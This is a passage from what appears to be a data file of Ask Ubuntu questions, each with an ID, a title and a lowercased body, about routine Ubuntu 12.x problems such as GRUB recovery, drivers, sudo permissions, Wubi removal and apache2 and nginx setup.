and the fdisk -l output : http : //pastebin.com/3xu3huvk how do i a ) make the healthy drive accessible again and read the data created by ddrescue or b ) reformat the healthy drive to be accessible again . and mount the broken drive so i can copypaste everything ( or do it with testdisk )
210956	how do i remove the workspace switcher from the unity dock in 12.10 ?	this was the go-to way to do this prior to 12.10 , but in 12.10 you do n't have the plugins/unityshell/src/launchercontroller.cpp file anymore . any way to do this in 12.10 ?
210957	geforce 670m on 12.10 - compiz glitching	i 've just done a fresh install on a new laptop that has a 670m . ubuntu defaults to using nouveau however there 's a fair amount of corruption on certain visual elements . for reference , windows 7 & 8 do n't encounter the same issues . so , i figured i 'd try installing the latest nvidia drivers , although after installing them , my resolution becomes extremely low and unity appears to fail to start ( although nautilus seems fine and i get a `` desktop '' , just nothing else ) . what 's the best way to get working nvidia drivers on 12.10 with a 670m ?
210959	ubuntu wo n't shutdown ( stuck on `` stopping virtualbox kernel modules '' )	when try to shutdown the computer it stays on a `` stopping virtualbox kernel modules '' message . it looks like it has to do something with virtualbox , but happens even if i did n't use virtualbox at all . also it happens randomly . this is what i see on the screen . the system is going down for halt now * stopping timidity++ alsa midi emulation ... hecking for running unattended-upgrades : * stopping upnp devices daemon minissdpd minissdpd [ 1194 ] : received signal 15 , good bye speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * stopping virtualbox kernel modules and it stays here forever if i do n't do the `` force power-off '' . my specs : ubuntu 12.04 lts on dell studio 1555 laptop
210960	paginate with tail -f command	i am trying to tail file with pagination : tail -f foo.txt | more this works fine until file gets , lets say , 200 lines injected , when this happens nature of tail command is to go to end of file , at that point i lose track of trailing the log . is there a way to avoid this ?
210961	wifi repeatedly asks for password ( ubuntu 12.10 fresh )	i 'm sure the passphrase is correct 100 % but wifi keeps asking for authentication and never connects . what can i do ? i 've tried removing the networks , resetting the router , changing the password , rebooting ubuntu , disabling ipv6 . also , it worked until earlier today and then stopped . all my other devices log in fine .
210962	window controls missing ; can not maximise or minimize applications	ubuntu 12.10 32 bits , fresh installation . how can i make unity maximize or minimize a window ? i see no button , option , anything , do i miss something big ? quick googling did not give me a piece of answer , too : on first screen , i have a terminal window . only clue about maximizing it i found was pressing f11 which made it fullscreen , hiding left bar as well . i would prefer it to take whole free space instead of whole screen . how can i do that ? on second screen , i have an opera browser which takes bigger part of the screen but i ca n't make it take whole screen . restarting opera did not work . how do i minimize/maximize apps ? also , in case i would like to see the desktop , only solution i found was closing everything help guys . i kind of like new gui , but i ca n't have simplest tasks done there , i feel like i miss something big there .
210964	writing note taking app , save and load text with tags from textbuffer written in python and glade	i am writing a note taking app with python and glade . i 've been searching the web for the how to save and retrieve textbuffer with tags from simple app made with python and glade . i would like to get an in-depth answer as i am just starting to know python a little . so here 's the situation : text loads fine , but tags that have been applied are lost upon opening the my editor again . heres my read , write solution on how to save and open file with textbuffer into textview : def on_saver_clicked ( self , widget ) : print `` saved '' start , end = self.textbuffer.get_bounds ( ) text = self.textbuffer.get_text ( start , end , false ) file = open ( `` note.txt '' , `` w '' ) file.write ( text ) file.close ( ) def on_opener_clicked ( self , widget ) : print `` loaded '' file = open ( `` note.txt '' , `` r '' ) text = file.read ( ) file.close ( ) self.textbuffer.set_text ( text ) any ideas on how to save and retrieve the applied tags to the text ? also , could anybody tell me how to properly setup gtk.textbuffer.register_serialize_format ?
210966	how to remove wubi install from windows 7 , when i have done a clean install of windows 8- no dual-boot ?	i had ubuntu 12.10 intalled using wubi on my windows 7 . i then installed windows 8 , and remove windows 7 . the bootloader and folders on c : drive still exist , and i ca n't unistall wubi , as it is'nt installed on windows 8 . also , i ca n't install ubuntu using wubi on windows 8 because there is already a folder named 'ubuntu ' ? what should i do ? try to delete the files associated with ubuntu ? ?
210967	how to report a system bug	i 'm dealing with this issue : ubuntu wo n't shutdown ( virtualbox kernel modules ) and i almost lost my nerves when i wanted to report a bug . i 'm studying this `` how to report a bug '' topic for two hours now and i still feel like a total newby . first i go here https : //bugs.launchpad.net/ubuntu/ and try to click on `` report a bug '' link which takes me here : https : //help.ubuntu.com/community/reportingbugs and i actually read that article but i 'm still lost . when i came to the `` system crash '' there 's just one sentence : if your system lockups up , freezes , logs you out , etc. , then this is not an application crash , but a system crash . please see below , and consult the following article for these types of problems https : //help.ubuntu.com/community/debuggingsystemcrash . so does it say that you can not report a system crash bug ? because on that `` debuggingsystemcrash '' article there 's nothing about reporting a bug . then i came here on askubuntu and found questions like this : how do i report a bug ? ... but again none of them helped me . they all had a bug about some application . so they just ran `` ubuntu-bug pid , but i ca n't do that because i do n't know the pid neither the package where the bug is . it just happens during shutdown process . where are the good old fashion days when you just went to launchpad and clicked on `` report a bug '' and that was it . maybe that caused a lot of bad reports , but the new way people just wo n't report bugs if they do n't find out how ...
210968	ubuntu 12.10 software center issues	failing at installing/removing any packages or codecs , plugin installation fails too.. error looks as : an unhandlable error occured there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . details : org.freedesktop.dbus.error.spawn.childsignaled : process /usr/lib/dbus-1.0/dbus-daemon-launch-helper received signal 6 while tring various commands through terminal i get these details at the end and info that dpkg has error processing these ... errors were encountered while processing : lsb-release python3.2-minimal python3.2 python3-distupgrade ubuntu-release-upgrader-core python3-problem-report python3-apport apport apport-gtk libcompizconfig0 compiz-gnome compiz firefox firefox-globalmenu firefox-gnome-support libpython3.2 python-apport ubuntu-release-upgrader-gtk the following error also shows up in the terminal fatal python error : py_initialize : unable to get the locale encoding eoferror : eof read where not expected aborted ( core dumped ) i couldnt find any solution in existing forums , any help will be appreciated .
210973	what happens when suspended ?	i have a laptop - lenovo t60 . when i close the lid , i see that the machine goes into suspended mode . the moment i open the lid , the laptop is instantly a live . my concern - does going into suspended mode make it safe to trasnport the computer - eg : travel on a bumpy road . i ask because i 'm not sure which parts shut off ... for example , if the hard drive is still running , i 'd say it 's never safe to travel with the laptop in this mode . i 'd like some thoughts on this . thanks !
210976	apt-get remove with wildcard removed way more than expected . why ?	last night i was trying to burn cds . being annoyed with k3b and choosing to use brasero instead , i went to remove k3b . i typed in : sudo apt-get remove k3b i hit tab twice and saw that i had both k3b and k3b-data on my system . assuming that i would n't need k3b-data on my system without k3b , i wanted to remove it as well so i typed in : sudo apt-get remove k3b* unfortunately i hit y to confirm without looking . it uninstalled a whole lot more than k3b and k3b-data . it uninstalled packages which did not fit my `` k3b* '' regex . for example : transmission and network-manager i 'm fairly certain that i did n't have a space between k3b and * but i do n't know why else it would remove all that it did . is there something about apt-get that i 'm misunderstanding ?
210977	find out which process wakes my hard drive from sleep state	i have an external drive connected to my computer , i want this drive to be in sleep mode unless i 'm executing some backup tool . for some reason , after 14 minutes i think , the hard drive always wakes up . ** edit ** i tried the following things : btrace /dev/myexternal- to see which system call calls my external hard drive . unfortunately at the moment my hd wakes up i do n't see any call . fuser /dev/myexternal - to see which processes use this hd . lsof - to see if there are files which has accessed . mount the external drive manually to /mnt stop lightdm and several processes/services . how can i find which process wakes the hard drive ?
210982	do i need to uninstall ubuntu to upgrade to windows 8 ?	all that was an awesome experience using ubuntu 12.04 . i want to upgrade my windows 7 to windows 8 . so do i need to uninstall my ubuntu ( as a precaution ) ? right now i have both the operating systems on my laptop . if i have to uninstall please tell me the procedure .
210990	which types of updates will i continue to get in 12.04 lts ?	i 've decided to keep using ubuntu 12.04 lts . besides the updates from the manually added ppa 's , which other updates will i get ? in particular , i 'm curious about : security updates kernel updates software ( such as rhythmbox , chromium , firefox , etc ) updates
210991	error when running sudo , getting a permission denied	i was installing git on my machine , when i sudo any thing , this error message appears : sudo : must be setuid root i tried from recovery mode to change permissions of usr/bin/sudo by : chown root : root /usr/bin/sudo chmod 4755 /usr/bin/sudo chmod 0440 /etc/sudoers but the chown or chmod not working cause the file is read only .
210994	only user can no more sudo and root account in safemode has password	i accidentally commented the line members of the admin group may gain root privileges : % admin all= ( all ) all in /etc/sudoers file , now i am unable to sudo into my system using the only available existing user . the default solution would be to drop into root account by going into safe mode but problem is root account seems to have password set which i do n't remember ( i do n't even remember when i set it ) , so i am unable to enter into root account in safe mode to fix this file . i can do anything non-related to sudo like browsing internet , posting this post but not basic stuffs like proper shutting down of computer using halt command , etc . so , can anyone provide solution to it ? can live cd help here . i do n't want to mess it again . it just one line mistake that 's it . my system is ubuntu 12.04 if there is specific fix in this version .
211006	unable to transfer file via bluetooth from android phone	when i try to send a file from my samsung galaxy nexus phone to my ubuntu 12.10 pc , i get a message on the phone reading `` connection unsuccessful '' . what might be the cause of this ? the devices are paired and i can succesfully send files from the pc to the phone .
211009	uninstall windows 7 from ubuntu ?	i have installed ubuntu inside windows 7 via wubi . how do i uninstall windows 7 , keeping ubuntu as my primary os ?
211014	evolution calendar without email account attached	i have been using evolution for it 's calendar for some time now . but every time i open the calendar , it asks for my email password . so today , i had enough , i deleted my email account from evolution ( i use a different program for emails ) but now i ca n't open evolution because it wants to add an email account . is there a work arround for this ? since i ca n't manage my calendar anymore ( unless i add an email account ) .
211015	problem with installing ubuntu on nexus7 in a vm	i met a problem while installing ubuntu on my nexus7 in a virtual box vm . although the tablet was unlocked and successfully loaded with fastboot method , installation stuck while erasing data . why would it happen ?
211020	ca n't install - grub probe : error : unknown filesystem -- help ?	i ca n't install ubuntu on my computer , i 'm using a 12.04 lts livecd . i have 2 empty hard drives ( 500 gb each ) and no other operating system 's installed . the installer always seems to be stuck at the `` copying files '' dialog , even though the progress bar is moving forward.the last message by the console window is ubiquity : grub probe : error : unknown filesystem all the google searches till now have led me to this problem appearing after installation and always followed by a grub rescue > which i do n't get , i tried creating an ext3 partition ( root `` / `` ) of the whole drive ( with a 16 gb swap at the end of the drive ) because i read that grub 2 does n't agree well with ext4 , but i 'm still getting the same error , tried to install on sdb instead sda as well but no luck , could i get some help here please ?
211022	unable to install vlc player through ubuntu software centre	i am using ubuntu 12.04 version . i am trying to install vlc media player through software centre . but i cant . pop up message shows that `` the action would require the installation of packages from not authenticated sources . '' please guide me how to do install it ? thanks in advance !
211023	how can i start programming with quickly	i downloaded quickly from software centre as described in http : //developer.ubuntu.com and i started making apps from the tutorial but it seems that those apps are n't working . can you help me : - )
211024	how can i boot into windows from grub rescue without a cd drive ?	this is my situation : i installed ubuntu without a cd ( using a usb ) dual boot installation ( windows 7+ubuntu ) i did not like the installation and decided to boot into windows and delete the linux partitions , but i forgot to fix the mbr from within windows . now , when i boot , i am stuck in the grub rescue limbo . how can i boot into windows from grub rescue ? i can not boot from cd because i do n't have a cd drive , therefore the usual solutions ( recovery cd etc ) do not work . any hints ? is there a way i can maybe do this through a usb ?
211025	screen froze at preparing to install ubuntu	i have a windows 7 home premium system . when i try to install ubuntu 12.10 from a usb stick , the installation screen gets stuck at preparing to install ubuntu . i am well aware that it has already been asked before at ubuntu 12.10 installation hangs at 'preparing to install ubuntu ' but i really do n't know how to clean the partition . previously , i had used the windows installer of ubuntu 12.04 over my existing windows 7 and have uninstalled it completely and want to install 12.10 fresh . any help is appreciated . thanks .
211026	can a windows 8 partition be mounted in ubuntu if `` fast startup '' is switched on ?	i 'm aware that when a windows session is hibernated , its disk partition can not be mounted in ubuntu . by default in windows 8 , a hybrid shutdown/hibernate feature is used ( fast startup ) which hibernates the kernel session but shuts down everything else . is there any way to mount a partition in this hybrid shutdown state ? even theoretically ?
211029	regarding inbuilt application postgresql	in my work i need to study about fossology . this tool supports only in linux . so i have installed ubuntu version 12.10 quantal . through net i have come to know ubuntu has inbuilt postgresql application . but when i installed i do n't know how to see whether it is already installed . could you please help me in solving this issue . it 's high priority and i have short time to finish my work . i have downloaded manually and while install after executing this command sudo dpkg -i file.dep i am getting error message saying that this need root user privileges . please help me .
211034	ways to completely uninstall ubuntu	i 've been trying for hours to remove ubuntu which is the only os on my laptop . i do n't have a windows installation there . i 've followed various bits of help , including trying to get boot-repair to work ( i just get error messages when i try to run the recommended commands ) . please can someone tell me how to get rid of ubuntu ? it wo n't recognize my .iso copy of windows - tries to read the dvd and then just boots ubuntu anyway . the dvd is fine - i can use it on other computers and it 's perfectly ok .
211035	rf kill unblock all does not work !	ubuntu 12.04 wireless disabled by hardware switch , rf kill unblock all , and rf kill list does not work ! what next ? all i get is `` command `` rf '' not found ''
211037	how to delete all data from the package ?	can you explain me how to delete all data from the specific program ? i need to remove all user settings and data base of several packages . specifically i wish delete all settings and media library from rhythmbox and clementine . i tried to find their files in home folder , but cache of images is the only that i found there .
211038	ca n't find openssl	i 'm trying to work with boost : asio to establish a ssl connection . now , my compiler says , it ca n't find openssl/conf.h i 'd like to know where this path is and how to fix this problem . thanks in advance .
211039	getting system to boot in headless mode set-up without display problems	previously i had ubuntu 11.04 and i could boot with no monitor attached . now i have installed ubuntu 12.10 with autologin and i 've found that is incapable of booting correctly if the monitor is n't attached . is there a way to `` force '' ubuntu to `` remember '' last monitor attached or to define a virtual one to allow a `` normal '' booting ?
211048	sync keepassx with keepass2	simply put : in ubuntu i am using keepassx and in windows keepass2 . in am not able to export/import passwords from one to another . i would prefer to use the same database , but i do n't really know how . if there is no possibility to sync the 2 , can you recommend another password vault , which is able to sync passwords from 2 os , using a shared db . thanks i am using ubuntu 12.04 and win 7 . edit : i have noticed that keepass2 is available in the software center , so i have installed it , and i can successfully open my win7 database . now i will migrate my keepassx passwords . i am seeing now a huge difference in the looks . while keepassx does n't exactly have ubuntu like look & feel , it 's 100 times more elegant than the interface keepass2 comes with . well , maybe that was my initial decision for installing keepassx on my ubuntu machine . i ca n't remember . @ fossfreedom , please add your comment as a response , so that i can accept it . thank for the suggestion
211054	how to convert a sound file to opus	for testing , i want to convert an mp3 and wav file i have to opus , what are the steps to doing this ?
211056	unknown file system , after delete ubuntu partition	i deleted the partition which contains the ubuntu 12.0.4 os . i have windows in another partition ( dual boot ) . when i reboot the system , it shows me the following . unknown filesystem . grub rescue > i read the previous questions about this topic and i tried to install ubuntu again using usb flash drive but was unable to boot from this device . i do not have a the ubuntu livecd . what should i do now to boot from windows ?
211058	what is the difference between the broadcom-sta and bcmwl packages ?	both lots of source packages describe themselves as the broadcom sta driver . so what 's the difference and what should be used ? https : //launchpad.net/ubuntu/+source/bcmwl https : //launchpad.net/ubuntu/+source/broadcom-sta
211063	how to set global proxy where the username contains an `` @ '' character ?	i 'm connecting internet via proxy ( with authentication ) there is no problem with firefox but i ca n't connect to the internet on software center . i 've checked this topic but my username contains ' @ ' character , so it 's not working .
211066	ubuntu boots only with usb	just installed ubuntu 11.04 . but it boots only from usb . seems like i did n't pay attention during selecting boot device . sudo fdisk -l [ sudo ] password for klim : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000177e1 device boot start end blocks id system /dev/sda1 1 60045 482302976 83 linux /dev/sda2 60045 60802 6080513 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 60045 60802 6080512 82 linux swap / solaris disk /dev/sdb : 4004 mb , 4004511744 bytes 124 heads , 62 sectors/track , 1017 cylinders units = cylinders of 7688 * 512 = 3936256 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000eee1a device boot start end blocks id system /dev/sdb1 * 1 1017 3909317 b w95 fat32 grub updating or another `` grub '' operations do n't work as i 've tried . can i just copy whole boot folder from usb to hd or smth like that ? any kind of help is appreciated . apologize for my newbie skills .
211069	how to convert ext2 to ext4 ?	i installed ubuntu 12.10 , and i do n't know why , i have an ext2 partition . how can i convert this ext2 file system to an ext4 ? will i lose all my data ?
211073	how to secure network manager with password ?	in ubuntu 12.04 , how to lock the edit in dsl in network connection . so that nobody can see my internet connection password ( isp password ) or network manager should ask for password everytime when i want to connect to internet .
211084	how do i get ubuntu to ask me for a password at login again ?	i just installed ubuntu 12.10 and afterwards , i accidentally set the administrator account password to empty/null . this gave me problems when trying to do administrative tasks in the gui , so after reading up on askubuntu i used the passwd command to set the password for the account anew . however , at the login screen when clicking on the account , i 'm not asked to enter the password ; but , instead , i log in directly as if there is no password set for the account . when doing administrative tasks in the gui , i will be asked for a password . what do i do to be asked for the password at login time ? i did already try , several times , in the user account settings window to set a new password for the account . that is , in the settings window it does not say `` login without a password '' for my account and it shows that there is a password set for the account .
211087	how to make users with uid under 1000 appear in lightdm ?	i 've been trying to set this up , but i ca n't find a solution . it 's neccessary , because the machine ubuntu is on is a macbook and needs to have access to the files of the mac user . is there any way to get this to work ?
211088	how to uninstall ubuntu installed through the windows installer	i installed ubuntu 12.10 today using windows installer as i was using windows 7 on my dell inspiron 1545 model . it installed successfully but i can not connect to wi fi network though it works perfectly fine on my windows 7 . i tried to troubleshoot and install the drivers , but could not . i want to uninstall ubuntu now and reclaim my 15gb c space . how should i do it now ?
211090	how do i reinstall bootloader ?	i was running win 7 and ubuntu 12.04 alongside each other on diffirent partitions . i recently upgraded to win 8 and after installing it , it booted directly on win 8 . i 've put in my pendrive to run ubuntu from it , and i can see that my ubuntu installation is still installed on the harddrive . how do i get the bootloader to work again without reinstalling ubuntu again ?
211094	xubuntu keeps loading on install with usb stick	i 'm trying to install xubuntu on my computer . i 've followed a guide to create a usb bootable drive . i 've inserted the usb stick and started the computer . i can see xubuntu loading and after a minute or 2 it shows me a screen asking me if i 'd like to use the live version or if i 'd like to install . i choose install . then on the next screen i select english as language . when i click continue , xubuntu just keeps loading . it does n't really freeze as i can still quit and move the cursor . when i clicked quit , i see the live version and all is working just fine . i can browse the internet , etc . what could be wrong ?
211095	how to fix graphics artefacts in tuxguitar opensource ati drivers	since upgrading to 12.10 tuxguitar ( a program i use very often ) has graphical glitches and artefacts appearing on the staves on mouse over . this bug does n't seem to affect the functionality . playback is fine and there is no loss of sound quality . can anyone confirm this issue or suggest a fix . thanks in advance
211097	ubuntu 12.04 wo n't boot	i upgraded to 12.04 a while ago and the internet dropped out halfway through so something went wrong , i would have upgraded/downgraded it but i ca n't boot off a cd/usb and terminal and my update centre had no internet connection . i booted it up thismorning and it got stuck on the ubuntu with little dots under it page for ages before finally presenting me with a blank screen reading : busybox ( ubuntu v1.18.5-1ubuntu4 ) built in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i googled the problem and tried the suggested mount -t ntfs-3g/dev/sda /root -o force and it came back with the message : mount : ca n't read 'etc/fstab ' : no such file or directory .
211102	ubuntu 12.10 no network and no graphics	i recently upgraded ubuntu 12.04 to 12.10 only to find out that it wo n't connect to any network , neither wired nor wireless and the graphics is messed up too as in a low screen resolution . for 12.04 , my system was running perfectly . i do n't know why upgrade messed it up so bad . reinstalling the os is an issue because i have set up a lot of development environments that i can not afford to set it up again . some of the outputs : lspci -nn | grep 0200 : 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) nm-tool : networkmanager tool state : disconnected cat /etc/network/interfaces : auto lo iface lo inet loopback sudo cat /var/log/syslog | grep etwork | tail -n20 : nov 2 13:50:22 cobalt networkmanager [ 978 ] : scplugin-ifupdown : ( -1240454760 ) ... get_connections ( managed=false ) : return empty list . nov 2 13:50:22 cobalt networkmanager [ 978 ] : ifupdown : get unmanaged devices count : 0 nov 2 13:50:22 cobalt bluetoothd [ 1016 ] : failed to init network plugin nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > modem-manager is now available nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > wifi enabled by radio killswitch ; enabled by state file nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > wwan enabled by radio killswitch ; enabled by state file nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > wimax enabled by radio killswitch ; enabled by state file nov 2 13:50:22 cobalt networkmanager [ 978 ] : < info > networking is enabled by state file nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > bluez error getting default adapter : message did not receive a reply ( timeout by message bus ) nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > bluez error getting default adapter : message did not receive a reply ( timeout by message bus ) nov 2 13:50:22 cobalt kernel : [ 28.688167 ] type=1400 audit ( 1351882222.452:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1046 comm= '' apparmor_parser '' nov 2 13:50:22 cobalt bluetoothd [ 1062 ] : failed to init network plugin nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > bluez error getting default adapter : message did not receive a reply ( timeout by message bus ) nov 2 13:50:22 cobalt bluetoothd [ 1118 ] : failed to init network plugin nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > bluez error getting default adapter : message did not receive a reply ( timeout by message bus ) nov 2 13:50:22 cobalt bluetoothd [ 1237 ] : failed to init network plugin nov 2 13:50:22 cobalt networkmanager [ 978 ] : < warn > bluez error getting default adapter : message did not receive a reply ( timeout by message bus ) ps aux | grep -i network : root 978 0.0 0.1 23732 4808 ? ssl 13:50 0:00 networkmanager sudo modprobe -r forcedeth : fatal : module forcedeth not found
211103	how do i connect ubuntu to sony bravia led tv via hdmi ?	my laptop connects to 46 '' sony bravia led tv using hdmi cable in windows without any problem . however , it just does n't work with ubuntu 12.04 . it always says no signal . problem somewhat persists after upgrading to 13.04 . bravia detects my laptop as a connection now but i am unable to display anything . what drivers/applications should i install to connect via hdmi ? output of sudo lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 525m ] [ 10de:0df5 ] ( rev ff ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ rainbow peak ] [ 8086:008a ] ( rev 34 ) 04:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 )
211104	fresh install of 12.10 and many icons not showing on the launcher	after a brand new install of 12.10 many of the icons are not showing on the launcher on the left . if you hover mouse over them the description is shown and clicking on them activates the application . terminal , home folder , system settings , synaptic package manager and workspace switcher are all just blank . from dash if i search for any of the missing icons listed above the icon looks like a blank sheet of paper all suggestions appreciated
211106	how to install gcc 4.6.3 on 12.10 ?	i want to install a previous version of gcc to make intel compilers work correctly . can i use apt-get to install ? if so , which repository should i use ? any help is appreciated .
211109	grub error after installing ubuntu 12.10	i received a grub error after upgrading my perfectly working ubuntu 12.04 installation to 12.10 . the machine is a fairly new toshiba c640 satellite laptop . ubuntu was the only os on it . the solution being suggested is to reinstall 12.04 which is unacceptable , as i have a lot of docs and files in my home folder which i ca n't lose . is there a way to perform a rollback or reinstall without losing my files and settings ? if not , why was 12.10 released when it does n't work ? just curious .
211110	ubuntu apache2 start , stop , status , restart and reload commands fails	hi , i am new to ubuntu and i 'm still trying to figure this os out ( for work it 's brilliant , better than windows ) . before i wrote this question , i did my research via google , this website and even in stackoverflow.com . whatever error came up , i googled it but with no success on how to solve this . back to the main point : i tried to install ( lamp ) apache2 with this guide ( in german ) and this one ( in english ) . then i got stuck at the start command ( with which one is able to start the apache2 server ) , my first try to run the server was a success until i wrote sudo /etc/init.d/apache2 reload then it showed me an error : $ sudo /etc/init.d/apache2 reload * starting web server apache2 syntax error on line 1 of /etc/apache2/ports.conf : invalid command 'oder ' , perhaps misspelled or defined by a module not included in the server configuration action 'reload ' failed . the apache error log may have more information . [ fail ] i did n't even write the word `` oder '' so i closed the shell and opened it anew . it showed the same error . after that , i 've done some research and found out that my file ( index.html ( which is in my /var/www folder ) ) , which i access via the browser , when i type in http : //localhost should show up and tell that it was a success . so i removed apache2 and installed it again but now the following errors appear : $ sudo /etc/init.d/apache2 start * starting web server apache2 syntax error on line 1 of /etc/apache2/ports.conf : invalid command 'oder ' , perhaps misspelled or defined by a module not included in the server configuration action 'start ' failed . the apache error log may have more information . [ fail ] and still , i did n't even write `` oder '' in the command . i appreciate every help i can get , further thanks and have a nice day .
211111	kubuntu external hdd mount problem	i use kubuntu 12.10 . i have an external hdd : western digital wdbaar5000abk , i connect it to computer , it is recognized but it 's being mounted and unmounted every 5 seconds ... i ca n't copy anything from it . what should i do ? i also have a 16 giga kingston flash but everything is ok with it . the hard disk works well on windows 7 and if i remember correctly worked on a version of lubuntu also .
211113	can i use ubuntu to reinstall windows from a recovery disk ?	i have a laptop that wo n't boot into windows 7 64-bit due to a bad update . it also wo n't boot from the recovery disk . i can get into the setup options . if i install ubuntu from the live disk , can i use this to reinstall windows from the recovery disk ?
211115	run an xinput command when a device is connected ?	due to a bug in the kernel driver for the apple magic trackpad , two finger right click does n't work by default . however , you can fix the issue by running the following : xinput set-prop $ device_id `` synaptics click action '' 1 3 2 ... where $ device_id is the device id given for the device in the output of xinput -- list . due to the nature of the device ( bluetooth ) it 's not always connected . can i run this fix script every time that xinput detects the device as connected ?
211117	side by side subtitles	is there a video player in linux that can display subtitles from a srt file correctly for side by side 3d video ?
211119	no nvidia-drivers	i have a dell m4600 with nvidia quattro k2000m . after first installing ubuntu it showed 2 experimental drives in `` additional drivers '' . after reboot , they were gone . and i do n't have any xorg.conf . it does n't exist . and ubuntu ca n't recognize the graphics card . it says `` unknown '' . external monitor works through vga , but not hdmi or display-port . any ideas on what 's wrong and what to do ?
211121	nginx and automatic updates	i 'm on ubuntu 12.04.1 with unattended-upgrades configured for automatic security updates , and i installed nginx by first adding deb http : //nginx.org/packages/ubuntu/ lucid nginx deb-src http : //nginx.org/packages/ubuntu/ lucid nginx to /etc/apt/sources.list file , just as was suggested by the official wiki , and then by sudo apt-get update sudo apt-get install nginx which installed nginx with all the standard modules . but now i think i could make good use of one or two of the nginx optional modules , like the gzip precompression module or some security-related one . so far , i see two ways of adding an optional module to nginx , one is compiling and installing from the source code and the other is described in this article . so , which of the ways should i choose so that automatic updates still run for and apply to nginx and its optional modules ? or should i create a cron job with a command/script specific for nginx instead of using unattended-upgrades utility ? can i choose between volume updates and security-only updates to be automatically applied to the standard and optional modules ? and finally , is there a possibility to automatically update nginx 's modules on the fly ( without any connections having been dropped ) , like the documentation suggests it 's possible with sudo kill -usr2 $ ( cat /run/nginx.pid ) p.s . actually i 'm not certain if unattended-upgrades utility would automatically update the standard modules in the first place , not enough time has passed since nginx was installed to say for sure .
211123	anyone know of any opengl apps in ubuntu 12.04 ?	im trying to find some apps in ubuntu that use opengl mostly . so i can read and learn from the source code . i know of blender , but i looking for a smaller program . google just give me installation of opengl , nothing else . any suggestions would be help all of those looking for the same . thanks alex
